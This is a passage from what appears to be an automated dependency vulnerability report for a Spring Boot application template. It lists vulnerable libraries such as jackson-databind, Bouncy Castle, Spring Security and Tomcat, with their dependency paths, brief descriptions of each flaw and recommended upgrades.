  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 com.fasterxml.jackson.core:jackson-databind@2.13.1
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 com.fasterxml.jackson.core:jackson-databind@2.13.1
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.5.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 com.fasterxml.jackson.core:jackson-databind@2.13.1
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.5.

Overview

com.fasterxml.jackson.core:jackson-databind is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.

Affected versions of this package are vulnerable to Denial of Service (DoS) in the _deserializeWrappedValue() function in StdDeserializer.java, due to resource exhaustion when processing deeply nested arrays.

NOTE: This vulnerability is only exploitable when the non-default UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.12.7.1, 2.13.4.1 or higher.

References

medium severity

Observable Discrepancy

  • Vulnerable module: org.bouncycastle:bcprov-jdk15on
  • Introduced through: net.sf.jasperreports:jasperreports@6.19.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.lowagie:itext@2.1.7.js9 org.bouncycastle:bcprov-jdk15on@1.68

Overview

org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.

Affected versions of this package are vulnerable to Observable Discrepancy due to the timing difference between exceptions thrown when processing RSA key exchange handshakes, AKA Marvin.

Note: The implemented fix mitigates the leakage of data via the PKCS#1 interface, but does not fully alleviate the side-channel as it allows cases in which the padding check fails but the handshake succeeds.

Remediation

There is no fixed version for org.bouncycastle:bcprov-jdk15on.

References

medium severity

Session Fixation

  • Vulnerable module: org.springframework.security:spring-security-config
  • Introduced through: org.springframework.boot:spring-boot-starter-security@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.

Overview

org.springframework.security:spring-security-config is a security configuration package for Spring Framework.

Affected versions of this package are vulnerable to Session Fixation due to the logout functionality not properly clearing the security context when using serialized versions. Additionally, it is not possible to explicitly save an empty security context to the HttpSessionSecurityContextRepository. This allows users to stay authenticated after a logout.

NOTE: Applications are only vulnerable if any of the following conditions are true:

  • The SecurityContextHolderFilter or requireExplicitSave(true) is in use with logout support for serialized sessions, and invalidateHttpSession(false).

  • Users are logged out manually by saving an empty SecurityContext into the HttpSessionSecurityContextRepository.

  • A custom SecurityContextRepository is in use that does not rely on the HttpSession.

Remediation

Upgrade org.springframework.security:spring-security-config to version 5.7.8, 5.8.3, 6.0.3 or higher.

References

medium severity

Session Fixation

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.boot:spring-boot-starter-security@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Session Fixation due to the logout functionality not properly clearing the security context when using serialized versions. Additionally, it is not possible to explicitly save an empty security context to the HttpSessionSecurityContextRepository. This allows users to stay authenticated after a logout.

NOTE: Applications are only vulnerable if any of the following conditions are true:

  • The SecurityContextHolderFilter or requireExplicitSave(true) is in use with logout support for serialized sessions, and invalidateHttpSession(false).

  • Users are logged out manually by saving an empty SecurityContext into the HttpSessionSecurityContextRepository.

  • A custom SecurityContextRepository is in use that does not rely on the HttpSession.

Remediation

Upgrade org.springframework.security:spring-security-web to version 5.7.8, 5.8.3, 6.0.3 or higher.

References

medium severity

Uncontrolled Resource Consumption ('Resource Exhaustion')

  • Vulnerable module: org.bouncycastle:bcprov-jdk15on
  • Introduced through: net.sf.jasperreports:jasperreports@6.19.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.lowagie:itext@2.1.7.js9 org.bouncycastle:bcprov-jdk15on@1.68

Overview

org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.

Affected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') within the org.bouncycastle.openssl.PEMParser class. Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError.

Workaround

The attack can be avoided by filtering PEM requests containing EXTERNAL tagged encodings.

Remediation

There is no fixed version for org.bouncycastle:bcprov-jdk15on.

References

medium severity

Open Redirect

  • Vulnerable module: org.springframework:spring-web
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3, org.springframework.hateoas:spring-hateoas@1.5.1 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.1.5.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.1.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-web@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.11.

Overview

org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.

Affected versions of this package are vulnerable to Open Redirect when UriComponentsBuilder is used to parse an externally provided URL and perform validation checks on the host of the parsed URL.

Note: This is the same as CVE-2024-22259 and CVE-2024-22243, but with different input.

Remediation

Upgrade org.springframework:spring-web to version 5.3.34, 6.0.19, 6.1.6 or higher.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: org.webjars.bower:jquery-ui
  • Introduced through: org.webjars.bower:jquery-ui@1.12.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.webjars.bower:jquery-ui@1.12.1

Overview

org.webjars.bower:jquery-ui is a library for manipulating UI elements via jQuery.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the initialization of check-box-radio widget on an input tag enclosed within a label, which leads to the parent label contents being considered as the input label.

Exploiting this vulnerability is possible if a .checkboxradio( "refresh" ) call is executed on such a widget, and the initial HTML contains encoded HTML entities, leading them to be erroneously decoded.

Remediation

Upgrade org.webjars.bower:jquery-ui to version 1.13.2 or higher.

References

medium severity

Information Exposure

  • Vulnerable module: com.h2database:h2
  • Introduced through: com.h2database:h2@2.1.214

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.h2database:h2@2.1.214
    Remediation: Upgrade to com.h2database:h2@2.2.220.

Overview

com.h2database:h2 is a database engine

Affected versions of this package are vulnerable to Information Exposure when H2 web-based admin console was started via the CLI with the argument -webAdminPassword, which allows a local user to specify the password in plaintext for the web admin console. Consequently, a malicious local user or an attacker that has obtained local access through some means would be able to get the password for the H2 web admin console by looking at the running processes.

Vendor Statement: "This is not a vulnerability of the H2 Console, this is an example of how not to use it. I think there is nothing to do with it on the H2 side. Passwords should never be passed on the command line, and every qualified DBA or system administrator is expected to know that."

Remediation

Upgrade com.h2database:h2 to version 2.2.220 or higher.

References

medium severity

Improper Input Validation

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Improper Input Validation due to the improper handling of HTTP trailer headers. An attacker can manipulate the server into treating a single request as multiple requests by sending a specially crafted, invalid trailer header. This could lead to request smuggling when the server is behind a reverse proxy.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.94, 9.0.81, 10.1.14, 11.0.0-M12 or higher.

References

medium severity

Incomplete Cleanup

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Incomplete Cleanup when recycling various internal objects. An error could cause some parts of the recycling process to be skipped, leading to information leaking from the current request/response to the next. An attacker can gain unauthorised access to sensitive information by exploiting this error.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.94, 9.0.81, 10.1.14, 11.0.0-M12 or higher.

References

medium severity

Unprotected Transport of Credentials

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.10.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Unprotected Transport of Credentials when using the RemoteIpFilter with requests received from a reverse proxy via HTTP, in which the X-Forwarded-Proto header is set to https. Session cookies do not include the secure attribute, so the user agent may transmit the session cookie over an insecure channel.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.86, 9.0.72, 10.1.6, 11.0.0-M3 or higher.

References

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.bouncycastle:bcprov-jdk15on
  • Introduced through: net.sf.jasperreports:jasperreports@6.19.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.lowagie:itext@2.1.7.js9 org.bouncycastle:bcprov-jdk15on@1.68

Overview

org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the solveQuadraticEquation() function used for certificate verification in ECCurve.java. Passing a large f2m parameter can cause excessive CPU consumption.

Remediation

There is no fixed version for org.bouncycastle:bcprov-jdk15on.

References

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.springframework:spring-expression
  • Introduced through: org.springframework.hateoas:spring-hateoas@1.5.1, org.springframework.boot:spring-boot-starter-security@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@1.5.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
